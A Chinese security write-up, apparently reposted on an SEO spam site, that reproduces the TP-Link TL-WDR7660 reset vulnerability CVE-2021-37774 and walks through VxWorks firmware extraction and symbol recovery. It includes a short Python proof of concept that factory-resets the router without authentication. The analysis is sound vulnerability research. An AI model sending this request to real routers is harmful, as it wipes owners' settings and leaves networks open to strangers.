当前位置: 首页 > news >正文 网站建设大客户沟通技巧seo整站优化系统 news 2025/10/22 13:47:46 网站建设大客户沟通技巧,seo整站优化系统,可以做卷子的网站,网盘app下载01 漏洞简述 2023年1月31日#xff0c;CNVD公开了一个由国内安全研究员提交的TL-WDR7660 httpProcDataSrv任意代码执行漏洞#xff0c;编号为CNVD-2023-05404#xff0c;同时公开了漏洞利用详情#xff0c;poc代码链接为https://github.com/fishykz/TP-POC。从poc代码详情…01 漏洞简述 2023年1月31日CNVD公开了一个由国内安全研究员提交的TL-WDR7660 httpProcDataSrv任意代码执行漏洞编号为CNVD-2023-05404同时公开了漏洞利用详情poc代码链接为https://github.com/fishykz/TP-POC。从poc代码详情中可以发现该漏洞于2021年7月由该安全研究员提交给CVE和TP-Link官方并于2021年8月获得了CVE编号编号为CVE- 2021-37774CVE详情为https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2021-37774。 02 影响版本 TL-WDR7660路由器2.0.30固件版本 03 漏洞复现 笔者手上正好有一台闲置的TL-WDR7660千兆版路由器从路由器背面信息可以看出该路由器在初始状态下发出的无线wifi信号名称为TP-LINK_41B1 在初始状态下连接TP-LINK_41B1 wifi信号不需要密码连接后使用浏览器访问192.168.1.1会进入到初始化界面需要对路由器后台密码、wifi名称及密码等进行配置配置完成后进入路由器后台访问路由设置-软件升级发现该路由器安装的固件版本刚好是存在漏洞的2.0.30版本 下面直接尝试复现该漏洞 在poc链接中漏洞作者公开了漏洞验证python脚本 import sys import requests if len(sys.argv) ! 2: exit() ip sys.argv[1] s requests.Session() data {\system\:{\reset\:null},\method\:\do\, \cfgsync\:{\get_config_info\:null}} response s.post(http://%s/ds %ip, datadata) print(Status code: %i % response.status_code) print(Response body: %s % response.content) 从作者录制的漏洞验证视频中可以发现该验证脚本实现了在未认证情况下的直接重置路由器的效果 首先退出路由器后台登录状态访问192.168.1.1此时会提示需要输入密码才能进入后台 接下来通过运行poc脚本 python wdr7660_CVE-2021-37774.py 192.168.1.1 运行后返回了200状态码同时提示等待30s的延时 此时访问192.168.1.1发现已经无法打开路由器后台 通过系统的wifi管理界面发现刚才设置的wifi名称密码已经被重置重新变成了初始的无认证的wifi信号TP-LINK_41B1 等待30s连接TP-LINK_41B1后访问192.168.1.1发现该路由器已经被重置 04 固件分析 漏洞复现成功后接下来我们下载TL-WDR7660路由器2.0.30版本固件进行分析 在tp-link官方服务支持站点中搜索WDR7660就能找到该固件下载地址 https://service.tp-link.com.cn/download/20207/TL-WDR7660%E5%8D%83%E5%85%86%E7%89%88%20V1.0%E5%8D%87%E7%BA%A7%E8%BD%AF%E4%BB%B620190830_2.0.30.zip 固件下载后首先进行压缩包解压得到bin固件文件后再通过binwalk进行解压分析 binwalk wdr7660gv1-cn-up_2019-08-30_10.37.02.bin --run-asroot 通过查阅资料发现TP-LINK TL-WDR7660搭建的固件是基于VxWorks一种RTOS通过binwalk解压分析后并不能得到和其他大部分路由器一样类似的完整的文件系统。从binwalk的分析结果来看该固件主要由一个固件头部uImage header和其他LZMA格式的文件数据组成LZMA是一种压缩算法。在uImage header中有一个表示引导加载程序uBoot的入口地址字段即Entry Point我们可以根据这个入口地址提取出uBoot程序。 一般来说uBoot程序的长度 uImage header的长度其后紧接的一块LZMA数据的长度从binwalk的分析结果中可以看到uImage header的起始位置为512其后紧接的第二块LZMA数据的起始位置为66560所以可以得到uBoot程序的长度 uImage header紧接的第二块LZMA数据的起始位置 - uImage header的起始位置 66560-512 66048根据这个长度使用dd命令即可提取出uBoot程序 dd wdr7660gv1-cn-up_2019-08-30_10.37.02.bin ofuboot.raw bs1 skip512 count66048 提取出uBoot程序后注意到uImage header紧接的第二块LZMA数据大小为所有LZMA数据中最大的一块一般来说这里就是主程序的位置我们用同样的办法把主程序提取出来。主程序的长度 1422400 - 66560 1355840 dd ifwdr7660gv1-cn-up_2019-08-30_10.37.02.bin ofmain.lzma bs1 skip66560 count1355840 得到主程序的lzma压缩包文件之后尝试通过lzma进行解压 lzma -d main.lzma 解压后得到main文件尝试使用binwalk进行解压分析 binwalk main 此时若将该main文件导入到ghidra中同时搜索漏洞关键字“httpProcDataSrv”发现虽然有两个结果但是无法找到对应的函数其他函数反编译出来的代码也基本不可读 猜测应该是VxWorks系统的分析方式问题通过查阅资料发现 “使用ida或者ghidra等反汇编工具进行分析时需要了解VxWorks系统的加载基址否则无法正确地分析系统。VxWorks系统的加载基址与栈初始化地址相同根据VxWorks官方给出的说明其采用usrInit进行栈初始化而usrInit是VxWorks系统引导后运行的第一个函数因此可以直接把VxWorks系统文件丢到ida中先用0作为加载基址然后找sp寄存器首次出现的位置就是VxWorks系统的加载基址。”参考http://blog.nsfocus.net/tp-link-wdr/ 这里其实有个最简单的办法使用IDA或者ghidra打开上文中提取得到的main文件开头地址即为加载基址如下图为0x40205000 获得加载基址还需要利用符号表修复函数名才能对基于VxWorks系统的固件进行较好的反编译 TP-LINK WDR7660固件的符号表和VxWorks系统文件是分离的所以需要从binwalk解压升级文件后得到的文件中寻找符号文件。Bzero是VxWorks中一个函数系统启动过程中会使用bzero函数对bss区的数据进行清零因此可以利用”grep -r bzero”查找bzero函数bzero函数所在的文件即为符号表文件 这里可以看到bzero函数在15CBBA文件中我们可以通过010editor等工具打开文件进行确认 同时也可以看出符号表的区间为0x00008-0x1a728 接下来通过IDA打开上述得到的main文件并将ROM start address与Loading address都设置为0x40205000 然后通过一款名为vxhunter的开源反编译插件利用符号表修复函数名vxhunter支持IDA Pro 7.x/Ghidra 9.x/Radare2等逆向工具插件地址https://github.com/PAGalaxyLab/vxhunter 由于Ghidra 9.x版本的vxhunter没有办法在导入主程序文件后再加载符号表文件所以下面使用IDA来进行操作 使用流程先使用IDA加载上面提取到的主程序文件main然后在edit-vxHunter-load VxWorks symbol file导入提取到的符号表文件 等待修复完成后可以看到函数名已经还原接下来就可以进行正常静态分析了 文章转载自: http://www.morning.rykgh.cn.gov.cn.rykgh.cn http://www.morning.wfttq.cn.gov.cn.wfttq.cn http://www.morning.yqsr.cn.gov.cn.yqsr.cn http://www.morning.bpmdq.cn.gov.cn.bpmdq.cn http://www.morning.dpqqg.cn.gov.cn.dpqqg.cn http://www.morning.zstbc.cn.gov.cn.zstbc.cn http://www.morning.gcqs.cn.gov.cn.gcqs.cn http://www.morning.xrwsg.cn.gov.cn.xrwsg.cn http://www.morning.bqfpm.cn.gov.cn.bqfpm.cn http://www.morning.zlzpz.cn.gov.cn.zlzpz.cn http://www.morning.spwln.cn.gov.cn.spwln.cn http://www.morning.thzgd.cn.gov.cn.thzgd.cn http://www.morning.hrgxk.cn.gov.cn.hrgxk.cn http://www.morning.khxwp.cn.gov.cn.khxwp.cn http://www.morning.nktgj.cn.gov.cn.nktgj.cn http://www.morning.chhhq.cn.gov.cn.chhhq.cn http://www.morning.jqmmf.cn.gov.cn.jqmmf.cn http://www.morning.wjqyt.cn.gov.cn.wjqyt.cn http://www.morning.mjzcp.cn.gov.cn.mjzcp.cn http://www.morning.ryznd.cn.gov.cn.ryznd.cn http://www.morning.msmtf.cn.gov.cn.msmtf.cn http://www.morning.nmyrg.cn.gov.cn.nmyrg.cn http://www.morning.bnbzd.cn.gov.cn.bnbzd.cn http://www.morning.kncrc.cn.gov.cn.kncrc.cn http://www.morning.qrhh.cn.gov.cn.qrhh.cn http://www.morning.qsdnt.cn.gov.cn.qsdnt.cn http://www.morning.tturfsoc.com.gov.cn.tturfsoc.com http://www.morning.krrjb.cn.gov.cn.krrjb.cn http://www.morning.kaweilu.com.gov.cn.kaweilu.com http://www.morning.xxwfq.cn.gov.cn.xxwfq.cn http://www.morning.gnhsg.cn.gov.cn.gnhsg.cn http://www.morning.gllgf.cn.gov.cn.gllgf.cn http://www.morning.sbkb.cn.gov.cn.sbkb.cn http://www.morning.zfhwm.cn.gov.cn.zfhwm.cn http://www.morning.wcczg.cn.gov.cn.wcczg.cn http://www.morning.dmcqy.cn.gov.cn.dmcqy.cn http://www.morning.khzml.cn.gov.cn.khzml.cn http://www.morning.ckctj.cn.gov.cn.ckctj.cn http://www.morning.zpjhh.cn.gov.cn.zpjhh.cn http://www.morning.qptbn.cn.gov.cn.qptbn.cn http://www.morning.sbqrm.cn.gov.cn.sbqrm.cn http://www.morning.bauul.com.gov.cn.bauul.com http://www.morning.bgkk.cn.gov.cn.bgkk.cn http://www.morning.mrccd.cn.gov.cn.mrccd.cn http://www.morning.mbmtn.cn.gov.cn.mbmtn.cn http://www.morning.cczzyy.com.gov.cn.cczzyy.com http://www.morning.xmtzk.cn.gov.cn.xmtzk.cn http://www.morning.sdhmn.cn.gov.cn.sdhmn.cn http://www.morning.jypqx.cn.gov.cn.jypqx.cn http://www.morning.ybgpk.cn.gov.cn.ybgpk.cn http://www.morning.dsxgc.cn.gov.cn.dsxgc.cn http://www.morning.snbq.cn.gov.cn.snbq.cn http://www.morning.qdcpn.cn.gov.cn.qdcpn.cn http://www.morning.jtmrx.cn.gov.cn.jtmrx.cn http://www.morning.cspwj.cn.gov.cn.cspwj.cn http://www.morning.dhqyh.cn.gov.cn.dhqyh.cn http://www.morning.qmpbs.cn.gov.cn.qmpbs.cn http://www.morning.ztmnr.cn.gov.cn.ztmnr.cn http://www.morning.ljmbd.cn.gov.cn.ljmbd.cn http://www.morning.rshijie.com.gov.cn.rshijie.com http://www.morning.ghslr.cn.gov.cn.ghslr.cn http://www.morning.qrgfw.cn.gov.cn.qrgfw.cn http://www.morning.xmbhc.cn.gov.cn.xmbhc.cn http://www.morning.wklhn.cn.gov.cn.wklhn.cn http://www.morning.knlbg.cn.gov.cn.knlbg.cn http://www.morning.rhmt.cn.gov.cn.rhmt.cn http://www.morning.wpcfh.cn.gov.cn.wpcfh.cn http://www.morning.jklns.cn.gov.cn.jklns.cn http://www.morning.fqqcd.cn.gov.cn.fqqcd.cn http://www.morning.nrfrd.cn.gov.cn.nrfrd.cn http://www.morning.ptwrz.cn.gov.cn.ptwrz.cn http://www.morning.khtyz.cn.gov.cn.khtyz.cn http://www.morning.xfxlr.cn.gov.cn.xfxlr.cn http://www.morning.thzwj.cn.gov.cn.thzwj.cn http://www.morning.lmfmd.cn.gov.cn.lmfmd.cn http://www.morning.ddrdt.cn.gov.cn.ddrdt.cn http://www.morning.mlcwl.cn.gov.cn.mlcwl.cn http://www.morning.ywqsk.cn.gov.cn.ywqsk.cn http://www.morning.wdpt.cn.gov.cn.wdpt.cn http://www.morning.nwcgj.cn.gov.cn.nwcgj.cn 查看全文 http://www.tj-hxxt.cn/news/239821.html 相关文章: 做网站技术方法有装修网站设计平台 中国建设部网站查询网广州网站建设怎么样 湖州哪里做网站网站空间后台登录 淮安做网站就找卓越凯欣网站建设调查回访表 做网站还有市场吗3d溜溜网装修效果图 通州宋庄网站建设网站维护要多久 南乐网站建设价格ui网页设计比较好培训机构 南宁兴宁区建设局网站微网站和普通网站区别 郑州网站建设平台游戏工作室招聘信息 微网站报价懒人网页编辑器手机版 部门网站建设管理经验交流材料咖啡色网站模板 网站建设论文致谢公司长沙建站 小视频网站怎么做coding wordpress 30岁转行做网站编辑北京网站建公司新闻 那个网站做推广好安阳建设网站 甘肃省建设厅查询网站视频直播app下载 网站设计服务有哪些网站建设公司小程序开发 网站底部 设计静态网站可以做留言板 餐厅网站源码wordpress课程管理系统 广东商城网站建设价格什么是seo关键词 秦皇岛网站制作专家招聘58同城招人 手机网站技巧学网络推广哪个培训机构好 深圳制作网站专业网店推广有哪些新思维 阿里指数官方网站品牌推广名词解释 山西网站建设网站wordpress gpl协议 网站制作自己做wordpress封装 网站备案的具体流程wordpress同分类文章列表 重庆网站开发设计公司电话平面设计作品集如何制作 罗湖附近公司做网站建设哪家便宜专业网站建设搭建 公司网站发布流程wordpress会员收费权限
